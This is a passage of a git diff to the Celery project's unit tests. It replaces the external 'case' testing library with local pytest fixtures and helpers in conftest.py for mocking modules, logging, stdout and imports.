index fea6bf6976a..32440862bd2 100644
--- a/t/unit/app/test_log.py
+++ b/t/unit/app/test_log.py
@@ -6,8 +6,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
-from case.utils import get_logger_handlers
from celery import signals, uuid
from celery.app.log import TaskFormatter
@@ -15,6 +13,7 @@
get_task_logger, in_sighandler)
from celery.utils.log import logger as base_logger
from celery.utils.log import logger_isa, task_logger
+from t.unit import conftest
class test_TaskFormatter:
@@ -165,12 +164,10 @@ def test_get_logger_root(self):
logger = get_logger(base_logger.name)
assert logger.parent is logging.root
- @mock.restore_logging()
- def test_setup_logging_subsystem_misc(self):
+ def test_setup_logging_subsystem_misc(self, restore_logging):
self.app.log.setup_logging_subsystem(loglevel=None)
- @mock.restore_logging()
- def test_setup_logging_subsystem_misc2(self):
+ def test_setup_logging_subsystem_misc2(self, restore_logging):
self.app.conf.worker_hijack_root_logger = True
self.app.log.setup_logging_subsystem()
@@ -183,18 +180,15 @@ def test_configure_logger(self):
self.app.log._configure_logger(None, sys.stderr, None, '', False)
logger.handlers[:] = []
- @mock.restore_logging()
- def test_setup_logging_subsystem_colorize(self):
+ def test_setup_logging_subsystem_colorize(self, restore_logging):
self.app.log.setup_logging_subsystem(colorize=None)
self.app.log.setup_logging_subsystem(colorize=True)
- @mock.restore_logging()
- def test_setup_logging_subsystem_no_mputil(self):
- with mock.mask_modules('billiard.util'):
- self.app.log.setup_logging_subsystem()
+ @pytest.mark.masked_modules('billiard.util')
+ def test_setup_logging_subsystem_no_mputil(self, restore_logging, mask_modules):
+ self.app.log.setup_logging_subsystem()
- @mock.restore_logging()
- def test_setup_logger(self):
+ def test_setup_logger(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False, colorize=True)
logger.handlers = []
@@ -202,16 +196,14 @@ def test_setup_logger(self):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False, colorize=None)
# setup_logger logs to stderr without logfile argument.
- assert (get_logger_handlers(logger)[0].stream is
+ assert (conftest.get_logger_handlers(logger)[0].stream is
sys.__stderr__)
- @mock.restore_logging()
- def test_setup_logger_no_handlers_stream(self):
+ def test_setup_logger_no_handlers_stream(self, restore_logging):
l = self.get_logger()
l.handlers = []
- with mock.stdouts() as outs:
- stdout, stderr = outs
+ with conftest.stdouts() as (stdout, stderr):
l = self.setup_logger(logfile=sys.stderr,
loglevel=logging.INFO, root=False)
l.info('The quick brown fox...')
@@ -221,7 +213,7 @@ def test_setup_logger_no_handlers_stream(self):
def test_setup_logger_no_handlers_file(self, *args):
tempfile = mktemp(suffix='unittest', prefix='celery')
with patch('builtins.open') as osopen:
- with mock.restore_logging():
+ with conftest.restore_logging_context_manager():
files = defaultdict(StringIO)
def open_file(filename, *args, **kwargs):
@@ -236,16 +228,15 @@ def open_file(filename, *args, **kwargs):
l = self.setup_logger(
logfile=tempfile, loglevel=logging.INFO, root=False,
)
- assert isinstance(get_logger_handlers(l)[0],
+ assert isinstance(conftest.get_logger_handlers(l)[0],
logging.FileHandler)
assert tempfile in files
- @mock.restore_logging()
- def test_redirect_stdouts(self):
+ def test_redirect_stdouts(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
try:
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
self.app.log.redirect_stdouts_to_logger(
logger, loglevel=logging.ERROR,
)
@@ -257,12 +248,11 @@ def test_redirect_stdouts(self):
finally:
sys.stdout, sys.stderr = sys.__stdout__, sys.__stderr__
- @mock.restore_logging()
- def test_logging_proxy(self):
+ def test_logging_proxy(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
p = LoggingProxy(logger, loglevel=logging.ERROR)
p.close()
p.write('foo')
@@ -281,17 +271,16 @@ def test_logging_proxy(self):
p.close()
assert not p.isatty()
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
with in_sighandler():
p.write('foo')
assert stderr.getvalue()
- @mock.restore_logging()
- def test_logging_proxy_bytes(self):
+ def test_logging_proxy_bytes(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
p = LoggingProxy(logger, loglevel=logging.ERROR)
p.close()
p.write(b'foo')
@@ -306,13 +295,12 @@ def test_logging_proxy_bytes(self):
p.close()
assert not p.isatty()
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
with in_sighandler():
p.write(b'foo')
assert stderr.getvalue()
- @mock.restore_logging()
- def test_logging_proxy_recurse_protection(self):
+ def test_logging_proxy_recurse_protection(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
p = LoggingProxy(logger, loglevel=logging.ERROR)
diff --git a/t/unit/app/test_schedules.py b/t/unit/app/test_schedules.py
index 881791a10ed..a8bed808a30 100644
--- a/t/unit/app/test_schedules.py
+++ b/t/unit/app/test_schedules.py
@@ -2,16 +2,16 @@
from contextlib import contextmanager
from datetime import datetime, timedelta
from pickle import dumps, loads
+from unittest import TestCase
from unittest.mock import Mock
import pytest
import pytz
-from case import Case
from celery.schedules import (ParseException, crontab, crontab_parser,
schedule, solar)
-assertions = Case('__init__')
+assertions = TestCase('__init__')
@contextmanager
diff --git a/t/unit/backends/test_cache.py b/t/unit/backends/test_cache.py
index 9e1ac5d29e4..40ae4277331 100644
--- a/t/unit/backends/test_cache.py
+++ b/t/unit/backends/test_cache.py
@@ -4,12 +4,12 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from kombu.utils.encoding import ensure_bytes, str_to_bytes
from celery import signature, states, uuid
from celery.backends.cache import CacheBackend, DummyClient, backends
from celery.exceptions import ImproperlyConfigured
+from t.unit import conftest
class SomeClass:
@@ -148,7 +148,7 @@ def test_regression_worker_startup_info(self):
'cache+memcached://127.0.0.1:11211;127.0.0.2:11211;127.0.0.3/'
)
worker = self.app.Worker()
- with mock.stdouts():
+ with conftest.stdouts():
worker.on_start()
assert worker.startup_info()
@@ -201,31 +201,31 @@ class test_get_best_memcache(MockCacheMixin):
def test_pylibmc(self):
with self.mock_pylibmc():
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
assert cache.get_best_memcache()[0].__module__ == 'pylibmc'
- def test_memcache(self):
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- assert (cache.get_best_memcache()[0]().__module__ ==
- 'memcache')
-
- def test_no_implementations(self):
- with mock.mask_modules('pylibmc', 'memcache'):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
- with pytest.raises(ImproperlyConfigured):
- cache.get_best_memcache()
+ assert (cache.get_best_memcache()[0]().__module__ ==
+ 'memcache')
+
+ @pytest.mark.masked_modules('pylibmc', 'memcache')
+ def test_no_implementations(self, mask_modules):
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ with pytest.raises(ImproperlyConfigured):
+ cache.get_best_memcache()
def test_cached(self):
with self.mock_pylibmc():
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
cache.get_best_memcache()[0](behaviors={'foo': 'bar'})
@@ -241,30 +241,30 @@ def test_backends(self):
class test_memcache_key(MockCacheMixin):
- def test_memcache_unicode_key(self):
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache_unicode_key(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- task_id, result = str(uuid()), 42
- b = cache.CacheBackend(backend='memcache', app=self.app)
- b.store_result(task_id, result, state=states.SUCCESS)
- assert b.get_result(task_id) == result
-
- def test_memcache_bytes_key(self):
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ task_id, result = str(uuid()), 42
+ b = cache.CacheBackend(backend='memcache', app=self.app)
+ b.store_result(task_id, result, state=states.SUCCESS)
+ assert b.get_result(task_id) == result
+
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache_bytes_key(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- task_id, result = str_to_bytes(uuid()), 42
- b = cache.CacheBackend(backend='memcache', app=self.app)
- b.store_result(task_id, result, state=states.SUCCESS)
- assert b.get_result(task_id) == result
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ task_id, result = str_to_bytes(uuid()), 42
+ b = cache.CacheBackend(backend='memcache', app=self.app)
+ b.store_result(task_id, result, state=states.SUCCESS)
+ assert b.get_result(task_id) == result
def test_pylibmc_unicode_key(self):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
with self.mock_pylibmc():
from celery.backends import cache
cache._imp = [None]
@@ -274,7 +274,7 @@ def test_pylibmc_unicode_key(self):
assert b.get_result(task_id) == result
def test_pylibmc_bytes_key(self):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
with self.mock_pylibmc():
from celery.backends import cache
cache._imp = [None]
diff --git a/t/unit/backends/test_cassandra.py b/t/unit/backends/test_cassandra.py
index 3e648bff0ed..5df53a1e576 100644
--- a/t/unit/backends/test_cassandra.py
+++ b/t/unit/backends/test_cassandra.py
@@ -3,7 +3,6 @@
from unittest.mock import Mock
import pytest
-from case import mock
from celery import states
from celery.exceptions import ImproperlyConfigured
@@ -17,7 +16,6 @@
]
-@mock.module(*CASSANDRA_MODULES)
class test_CassandraBackend:
def setup(self):
@@ -27,7 +25,8 @@ def setup(self):
cassandra_table='task_results',
)
- def test_init_no_cassandra(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_init_no_cassandra(self, module):
# should raise ImproperlyConfigured when no python-driver
# installed.
from celery.backends import cassandra as mod
@@ -38,7 +37,8 @@ def test_init_no_cassandra(self, *modules):
finally:
mod.cassandra = prev
- def test_init_with_and_without_LOCAL_QUROM(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_init_with_and_without_LOCAL_QUROM(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
@@ -60,12 +60,14 @@ def test_init_with_and_without_LOCAL_QUROM(self, *modules):
app=self.app, keyspace='b', column_family='c',
)
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
@pytest.mark.usefixtures('depends_on_current_app')
- def test_reduce(self, *modules):
+ def test_reduce(self, module):
from celery.backends.cassandra import CassandraBackend
assert loads(dumps(CassandraBackend(app=self.app)))
- def test_get_task_meta_for(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_get_task_meta_for(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
@@ -95,7 +97,8 @@ def test_as_uri(self):
x.as_uri()
x.as_uri(include_password=False)
- def test_store_result(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_store_result(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index ee4d0517365..b56e928b026 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -4,7 +4,6 @@
import pytest
import pytz
-from case import mock
from kombu.exceptions import EncodeError
try:
@@ -15,6 +14,7 @@
from celery import states, uuid
from celery.backends.mongodb import Binary, InvalidDocument, MongoBackend
from celery.exceptions import ImproperlyConfigured
+from t.unit import conftest
COLLECTION = 'taskmeta_celery'
TASK_ID = uuid()
@@ -529,7 +529,7 @@ def test_regression_worker_startup_info(self):
'/work4us?replicaSet=rs&ssl=true'
)
worker = self.app.Worker()
- with mock.stdouts():
+ with conftest.stdouts():
worker.on_start()
assert worker.startup_info()
diff --git a/t/unit/backends/test_redis.py b/t/unit/backends/test_redis.py
index 13dcf2eee9a..f99fbc37a55 100644
--- a/t/unit/backends/test_redis.py
+++ b/t/unit/backends/test_redis.py
@@ -8,14 +8,15 @@
from unittest.mock import ANY, Mock, call, patch
import pytest
-from case import ContextMock, mock
from celery import signature, states, uuid
from celery.canvas import Signature
+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import (BackendStoreError, ChordError,
ImproperlyConfigured)
from celery.result import AsyncResult, GroupResult
from celery.utils.collections import AttributeDict
+from t.unit import conftest
def raise_on_second_call(mock, exc, *retval):
@@ -61,7 +62,7 @@ def execute(self):
return [step(*a, **kw) for step, a, kw in self.steps]
-class PubSub(mock.MockCallbacks):
+class PubSub(conftest.MockCallbacks):
def __init__(self, ignore_subscribe_messages=False):
self._subscribed_to = set()
@@ -78,7 +79,7 @@ def get_message(self, timeout=None):
pass
-class Redis(mock.MockCallbacks):
+class Redis(conftest.MockCallbacks):
Connection = Connection
Pipeline = Pipeline
pubsub = PubSub
@@ -158,7 +159,7 @@ def zcount(self, key, min_, max_):
return len(self.zrangebyscore(key, min_, max_))
-class Sentinel(mock.MockCallbacks):
+class Sentinel(conftest.MockCallbacks):
def __init__(self, sentinels, min_other_sentinels=0, sentinel_kwargs=None,
**connection_kwargs):
self.sentinel_kwargs = sentinel_kwargs
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index 713b63d7baf..2e2a47353b7 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -5,7 +5,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
import t.skip
from celery.app.defaults import DEFAULTS
@@ -64,55 +63,53 @@ def Loader(*args, **kwargs):
return loader
@patch('celery.platforms.signals')
- def test_process_initializer(self, _signals, set_mp_process_title):
- with mock.restore_logging():
- from celery import signals
- from celery._state import _tls
- from celery.concurrency.prefork import (WORKER_SIGIGNORE,
- WORKER_SIGRESET,
- process_initializer)
- on_worker_process_init = Mock()
- signals.worker_process_init.connect(on_worker_process_init)
-
- with self.Celery(loader=self.Loader) as app:
- app.conf = AttributeDict(DEFAULTS)
- process_initializer(app, 'awesome.worker.com')
- _signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
- _signals.reset.assert_any_call(*WORKER_SIGRESET)
- assert app.loader.init_worker.call_count
- on_worker_process_init.assert_called()
- assert _tls.current_app is app
- set_mp_process_title.assert_called_with(
- 'celeryd', hostname='awesome.worker.com',
- )
-
- with patch('celery.app.trace.setup_worker_optimizations') as S:
- os.environ['FORKED_BY_MULTIPROCESSING'] = '1'
- try:
- process_initializer(app, 'luke.worker.com')
- S.assert_called_with(app, 'luke.worker.com')
- finally:
- os.environ.pop('FORKED_BY_MULTIPROCESSING', None)
+ def test_process_initializer(self, _signals, set_mp_process_title, restore_logging):
+ from celery import signals
+ from celery._state import _tls
+ from celery.concurrency.prefork import (WORKER_SIGIGNORE,
+ WORKER_SIGRESET,
+ process_initializer)
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
+ _signals.reset.assert_any_call(*WORKER_SIGRESET)
+ assert app.loader.init_worker.call_count
+ on_worker_process_init.assert_called()
+ assert _tls.current_app is app
+ set_mp_process_title.assert_called_with(
+ 'celeryd', hostname='awesome.worker.com',
+ )
- os.environ['CELERY_LOG_FILE'] = 'worker%I.log'
- app.log.setup = Mock(name='log_setup')
+ with patch('celery.app.trace.setup_worker_optimizations') as S:
+ os.environ['FORKED_BY_MULTIPROCESSING'] = '1'
try:
process_initializer(app, 'luke.worker.com')
+ S.assert_called_with(app, 'luke.worker.com')
finally:
- os.environ.pop('CELERY_LOG_FILE', None)
+ os.environ.pop('FORKED_BY_MULTIPROCESSING', None)
+
+ os.environ['CELERY_LOG_FILE'] = 'worker%I.log'
+ app.log.setup = Mock(name='log_setup')
+ try:
+ process_initializer(app, 'luke.worker.com')
+ finally:
+ os.environ.pop('CELERY_LOG_FILE', None)
@patch('celery.platforms.set_pdeathsig')
- def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title):
- with mock.restore_logging():
- from celery import signals
- on_worker_process_init = Mock()
- signals.worker_process_init.connect(on_worker_process_init)
- from celery.concurrency.prefork import process_initializer
-
- with self.Celery(loader=self.Loader) as app:
- app.conf = AttributeDict(DEFAULTS)
- process_initializer(app, 'awesome.worker.com')
- _set_pdeathsig.assert_called_once_with('SIGKILL')
+ def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title, restore_logging):
+ from celery import signals
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+ from celery.concurrency.prefork import process_initializer
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _set_pdeathsig.assert_called_once_with('SIGKILL')
class test_process_destructor:
diff --git a/t/unit/conftest.py b/t/unit/conftest.py
index 90dc50682d5..458e9a2ebf0 100644
--- a/t/unit/conftest.py
+++ b/t/unit/conftest.py
@@ -1,13 +1,19 @@
+import builtins
+import inspect
+import io
import logging
import os
+import platform
import sys
import threading
+import types
import warnings
-from importlib import import_module
-from unittest.mock import Mock
+from contextlib import contextmanager
+from functools import wraps
+from importlib import import_module, reload
+from unittest.mock import MagicMock, Mock, patch
import pytest
-from case.utils import decorator
from kombu import Queue
from celery.backends.cache import CacheBackend, DummyClient
@@ -39,6 +45,24 @@ class WindowsError(Exception):
CASE_LOG_LEVEL_EFFECT = 'Test {0} modified the level of the root logger'
CASE_LOG_HANDLER_EFFECT = 'Test {0} modified handlers for the root logger'
+_SIO_write = io.StringIO.write
+_SIO_init = io.StringIO.__init__
+
+SENTINEL = object()
+
+
+def noop(*args, **kwargs):
+ pass
+
+
+class WhateverIO(io.StringIO):
+
+ def __init__(self, v=None, *a, **kw):
+ _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw)
+
+ def write(self, data):
+ _SIO_write(self, data.decode() if isinstance(data, bytes) else data)
+
@pytest.fixture(scope='session')
def celery_config():
@@ -88,7 +112,7 @@ def reset_cache_backend_state(celery_app):
backend._cache.clear()
-@decorator
+@contextmanager
def assert_signal_called(signal, **expected):
"""Context that verifes signal is called before exiting."""
handler = Mock()
@@ -113,7 +137,6 @@ def app(celery_app):
def AAA_disable_multiprocessing():
# pytest-cov breaks if a multiprocessing.Process is started,
# so disable them completely to make sure it doesn't happen.
- from unittest.mock import patch
stuff = [
'multiprocessing.Process',
'billiard.Process',
@@ -326,3 +349,447 @@ def import_all_modules(name=__name__, file=__file__,
'Ignored error importing module {}: {!r}'.format(
module, exc,
)))
+
+
+@pytest.fixture
+def sleepdeprived(request):
+ """Mock sleep method in patched module to do nothing.
+
+ Example:
+ >>> import time
+ >>> @pytest.mark.sleepdeprived_patched_module(time)
+ >>> def test_foo(self, sleepdeprived):
+ >>> pass
+ """
+ module = request.node.get_closest_marker(
+ "sleepdeprived_patched_module").args[0]
+ old_sleep, module.sleep = module.sleep, noop
+ try:
+ yield
+ finally:
+ module.sleep = old_sleep
+
+
+# Taken from
+# http://bitbucket.org/runeh/snippets/src/tip/missing_modules.py
+@pytest.fixture
+def mask_modules(request):
+ """Ban some modules from being importable inside the context
+ For example::
+ >>> @pytest.mark.masked_modules('gevent.monkey')
+ >>> def test_foo(self, mask_modules):
+ ... try:
+ ... import sys
+ ... except ImportError:
+ ... print('sys not found')
+ sys not found
+ """
+ realimport = builtins.__import__
+ modnames = request.node.get_closest_marker("masked_modules").args
+
+ def myimp(name, *args, **kwargs):
+ if name in modnames:
+ raise ImportError('No module named %s' % name)
+ else:
+ return realimport(name, *args, **kwargs)
+
+ builtins.__import__ = myimp
+ try:
+ yield
+ finally:
+ builtins.__import__ = realimport
+
+
+@pytest.fixture
+def environ(request):
+ """Mock environment variable value.
+ Example::
+ >>> @pytest.mark.patched_environ('DJANGO_SETTINGS_MODULE', 'proj.settings')
+ >>> def test_other_settings(self, environ):
+ ... ...
+ """
+ env_name, env_value = request.node.get_closest_marker("patched_environ").args
+ prev_val = os.environ.get(env_name, SENTINEL)
+ os.environ[env_name] = env_value
+ try:
+ yield
+ finally:
+ if prev_val is SENTINEL:
+ os.environ.pop(env_name, None)
+ else:
+ os.environ[env_name] = prev_val
+
+
+def replace_module_value(module, name, value=None):
+ """Mock module value, given a module, attribute name and value.
+
+ Example::
+
+ >>> replace_module_value(module, 'CONSTANT', 3.03)
+ """
+ has_prev = hasattr(module, name)
+ prev = getattr(module, name, None)
+ if value:
+ setattr(module, name, value)
+ else:
+ try:
+ delattr(module, name)
+ except AttributeError:
+ pass
+ try:
+ yield
+ finally:
+ if prev is not None:
+ setattr(module, name, prev)
+ if not has_prev:
+ try:
+ delattr(module, name)
+ except AttributeError:
+ pass
+
+
+@contextmanager
+def platform_pyimp(value=None):
+ """Mock :data:`platform.python_implementation`
+ Example::
+ >>> with platform_pyimp('PyPy'):
+ ... ...
+ """
+ yield from replace_module_value(platform, 'python_implementation', value)
+
+
+@contextmanager
+def sys_platform(value=None):
+ """Mock :data:`sys.platform`
+
+ Example::
+ >>> mock.sys_platform('darwin'):
+ ... ...
+ """
+ prev, sys.platform = sys.platform, value
+ try:
+ yield
+ finally:
+ sys.platform = prev
+
+
+@contextmanager
+def pypy_version(value=None):
+ """Mock :data:`sys.pypy_version_info`
+
+ Example::
+ >>> with pypy_version((3, 6, 1)):
+ ... ...
+ """
+ yield from replace_module_value(sys, 'pypy_version_info', value)
+
+
+def _restore_logging():
+ outs = sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__
+ root = logging.getLogger()
+ level = root.level
+ handlers = root.handlers
+
+ try:
+ yield
+ finally:
+ sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__ = outs
+ root.level = level
+ root.handlers[:] = handlers
+
+
+@contextmanager
+def restore_logging_context_manager():
+ """Restore root logger handlers after test returns.
+ Example::
+ >>> with restore_logging_context_manager():
+ ... setup_logging()
+ """
+ yield from _restore_logging()
+
+
+@pytest.fixture
+def restore_logging(request):
+ """Restore root logger handlers after test returns.
+ Example::
+ >>> def test_foo(self, restore_logging):
+ ... setup_logging()
+ """
+ yield from _restore_logging()
+
+
+@pytest.fixture
+def module(request):
+    """Mock one or more modules such that every attribute is a :class:`Mock`."""
+ yield from _module(*request.node.get_closest_marker("patched_module").args)
+
+
+@contextmanager
+def module_context_manager(*names):
+    """Mock one or more modules such that every attribute is a :class:`Mock`."""
+ yield from _module(*names)
+
+
+def _module(*names):
+ prev = {}
+
+ class MockModule(types.ModuleType):
+
+ def __getattr__(self, attr):
+ setattr(self, attr, Mock())
+ return types.ModuleType.__getattribute__(self, attr)
+
+ mods = []
+ for name in names:
+ try:
+ prev[name] = sys.modules[name]
+ except KeyError:
+ pass
+ mod = sys.modules[name] = MockModule(name)
+ mods.append(mod)
+ try:
+ yield mods
+ finally:
+ for name in names:
+ try:
+ sys.modules[name] = prev[name]
+ except KeyError:
+ try:
+ del(sys.modules[name])
+ except KeyError:
+ pass
+
+
+class _patching:
+
+ def __init__(self, monkeypatch, request):
+ self.monkeypatch = monkeypatch
+ self.request = request
+
+ def __getattr__(self, name):
+ return getattr(self.monkeypatch, name)
+
+ def __call__(self, path, value=SENTINEL, name=None,
+ new=MagicMock, **kwargs):
+ value = self._value_or_mock(value, new, name, path, **kwargs)
+ self.monkeypatch.setattr(path, value)
+ return value
+
+ def object(self, target, attribute, *args, **kwargs):
+ return _wrap_context(
+ patch.object(target, attribute, *args, **kwargs),
+ self.request)
+
+ def _value_or_mock(self, value, new, name, path, **kwargs):
+ if value is SENTINEL:
+ value = new(name=name or path.rpartition('.')[2])
+ for k, v in kwargs.items():
+ setattr(value, k, v)
+ return value
+
+ def setattr(self, target, name=SENTINEL, value=SENTINEL, **kwargs):
+ # alias to __call__ with the interface of pytest.monkeypatch.setattr
+ if value is SENTINEL:
+ value, name = name, None
+ return self(target, value, name=name)
+
+ def setitem(self, dic, name, value=SENTINEL, new=MagicMock, **kwargs):
+ # same as pytest.monkeypatch.setattr but default value is MagicMock
+ value = self._value_or_mock(value, new, name, dic, **kwargs)
+ self.monkeypatch.setitem(dic, name, value)
+ return value
+
+ def modules(self, *mods):
+ modules = []
+ for mod in mods:
+ mod = mod.split('.')
+ modules.extend(reversed([
+ '.'.join(mod[:-i] if i else mod) for i in range(len(mod))
+ ]))
+ modules = sorted(set(modules))
+ return _wrap_context(module_context_manager(*modules), self.request)
+
+
+def _wrap_context(context, request):
+ ret = context.__enter__()
+
+ def fin():
+ context.__exit__(*sys.exc_info())
+ request.addfinalizer(fin)
+ return ret
+
+
+@pytest.fixture()
+def patching(monkeypatch, request):
+    """Monkeypatch.setattr shortcut.
+ Example:
+ .. code-block:: python
+ >>> def test_foo(patching):
+ >>> # execv value here will be mock.MagicMock by default.
+ >>> execv = patching('os.execv')
+ >>> patching('sys.platform', 'darwin') # set concrete value
+ >>> patching.setenv('DJANGO_SETTINGS_MODULE', 'x.settings')
+ >>> # val will be of type mock.MagicMock by default
+ >>> val = patching.setitem('path.to.dict', 'KEY')
+ """
+ return _patching(monkeypatch, request)
+
+
+@contextmanager
+def stdouts():
+ """Override `sys.stdout` and `sys.stderr` with `StringIO`
+ instances.
+ >>> with conftest.stdouts() as (stdout, stderr):
+ ... something()
+ ... self.assertIn('foo', stdout.getvalue())
+ """
+ prev_out, prev_err = sys.stdout, sys.stderr
+ prev_rout, prev_rerr = sys.__stdout__, sys.__stderr__
+ mystdout, mystderr = WhateverIO(), WhateverIO()
+ sys.stdout = sys.__stdout__ = mystdout
+ sys.stderr = sys.__stderr__ = mystderr
+
+ try:
+ yield mystdout, mystderr
+ finally:
+ sys.stdout = prev_out
+ sys.stderr = prev_err
+ sys.__stdout__ = prev_rout
+ sys.__stderr__ = prev_rerr
+
+
+@contextmanager
+def reset_modules(*modules):
+ """Remove modules from :data:`sys.modules` by name,
+ and reset back again when the test/context returns.
+ Example::
+ >>> with conftest.reset_modules('celery.result', 'celery.app.base'):
+ ... pass
+ """
+ prev = {
+ k: sys.modules.pop(k) for k in modules if k in sys.modules
+ }
+
+ try:
+ for k in modules:
+ reload(import_module(k))
+ yield
+ finally:
+ sys.modules.update(prev)
+
+
+def get_logger_handlers(logger):
+ return [
+ h for h in logger.handlers
+ if not isinstance(h, logging.NullHandler)
+ ]
+
+
+@contextmanager
+def wrap_logger(logger, loglevel=logging.ERROR):
+ """Wrap :class:`logging.Logger` with a StringIO() handler.
+ yields a StringIO handle.
+ Example::
+ >>> with conftest.wrap_logger(logger, loglevel=logging.DEBUG) as sio:
+ ... ...
+ ... sio.getvalue()
+ """
+ old_handlers = get_logger_handlers(logger)
+ sio = WhateverIO()
+ siohandler = logging.StreamHandler(sio)
+ logger.handlers = [siohandler]
+
+ try:
+ yield sio
+ finally:
+ logger.handlers = old_handlers
+
+
+@contextmanager
+def _mock_context(mock):
+ context = mock.return_value = Mock()
+ context.__enter__ = Mock()
+ context.__exit__ = Mock()
+
+ def on_exit(*x):
+ if x[0]:
+ raise x[0] from x[1]
+ context.__exit__.side_effect = on_exit
+ context.__enter__.return_value = context
+ try:
+ yield context
+ finally:
+ context.reset()
+
+
+@contextmanager
+def open(side_effect=None):
+    """Patch builtins.open so that it returns a StringIO object.
+ :param side_effect: Additional side effect for when the open context
+ is entered.
+ Example::
+ >>> with mock.open(io.BytesIO) as open_fh:
+ ... something_opening_and_writing_bytes_to_a_file()
+ ... self.assertIn(b'foo', open_fh.getvalue())
+ """
+ with patch('builtins.open') as open_:
+ with _mock_context(open_) as context:
+ if side_effect is not None:
+ context.__enter__.side_effect = side_effect
+ val = context.__enter__.return_value = WhateverIO()
+ val.__exit__ = Mock()
+ yield val
+
+
+@contextmanager
+def module_exists(*modules):
+ """Patch one or more modules to ensure they exist.
+ A module name with multiple paths (e.g. gevent.monkey) will
+ ensure all parent modules are also patched (``gevent`` +
+ ``gevent.monkey``).
+ Example::
+ >>> with conftest.module_exists('gevent.monkey'):
+ ... gevent.monkey.patch_all = Mock(name='patch_all')
+ ... ...
+ """
+ gen = []
+ old_modules = []
+ for module in modules:
+ if isinstance(module, str):
+ module = types.ModuleType(module)
+ gen.append(module)
+ if module.__name__ in sys.modules:
+ old_modules.append(sys.modules[module.__name__])
+ sys.modules[module.__name__] = module
+ name = module.__name__
+ if '.' in name:
+ parent, _, attr = name.rpartition('.')
+ setattr(sys.modules[parent], attr, module)
+ try:
+ yield
+ finally:
+ for module in gen:
+ sys.modules.pop(module.__name__, None)
+ for module in old_modules:
+ sys.modules[module.__name__] = module
+
+
+def _bind(f, o):
+ @wraps(f)
+ def bound_meth(*fargs, **fkwargs):
+ return f(o, *fargs, **fkwargs)
+ return bound_meth
+
+
+class MockCallbacks:
+
+ def __new__(cls, *args, **kwargs):
+ r = Mock(name=cls.__name__)
+ cls.__init__(r, *args, **kwargs)
+ for key, value in vars(cls).items():
+ if key not in ('__dict__', '__weakref__', '__new__', '__init__'):
+ if inspect.ismethod(value) or inspect.isfunction(value):
+ r.__getattr__(key).side_effect = _bind(value, r)
